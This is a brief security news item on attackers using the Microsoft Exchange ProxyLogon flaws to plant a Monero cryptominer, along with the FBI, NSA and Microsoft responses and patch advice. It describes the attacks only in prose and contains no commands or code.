At the beginning of March, Microsoft discovered some zero-day vulnerabilities in its Exchange Servers were actively exploited by a hacking group known as Hafnium. Since then, a large number of attackers, including state-sponsored hackers, started exploiting these vulnerabilities in the wild. Recently, attackers were observed exploiting this vulnerability for mining cryptocurrency.

What has been discovered

Security researchers from Sophos revealed that attackers are trying to exploit the ProxyLogon vulnerabilities in Microsoft Exchange to install Monero cryptominer on the targeted servers.
  • The Monero wallet associated with this attack campaign started receiving funds on March 9, which is just a few days after the initial discovery of the ProxyLogon vulnerabilities.
  • To initiate the attack, the attackers use a PowerShell command that fetches a file from a previously hacked server, which, in turn, downloads executable payloads on the victim’s machine.
  • In addition, the attackers were found using a modified version of the tool PEx64-Injector, which is publically available on GitHub.

Corrective actions on the way

To cope with the rapidly growing threat, several agencies are working hard to contain the attacks.
  • The FBI carried out an operation to remove malicious web shells from all compromised Microsoft Exchange servers across the U.S., without notifying the servers' owners.
  • The NSA discovered and reported several new vulnerabilities (CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483) in Microsoft Exchange, which could lead to remote code execution in targeted machines.
  • Microsoft has provided patches for 114 flaws in its April 2021 Patch Tuesday release. These patches include fixes for the bugs in Microsoft Exchange, including two remote code execution vulnerabilities identified by the NSA.

The bottom line

Considering the widespread reach and rapid pace of propagation of Exchange server-based threats, all organizations using Microsoft Exchange Servers are recommended to be extra cautious with security. While security agencies are playing their part, organizations and individuals are expected to apply the patches at the earliest and check all the configuration settings to protect their email infrastructure from any mishap.

Cyware Publisher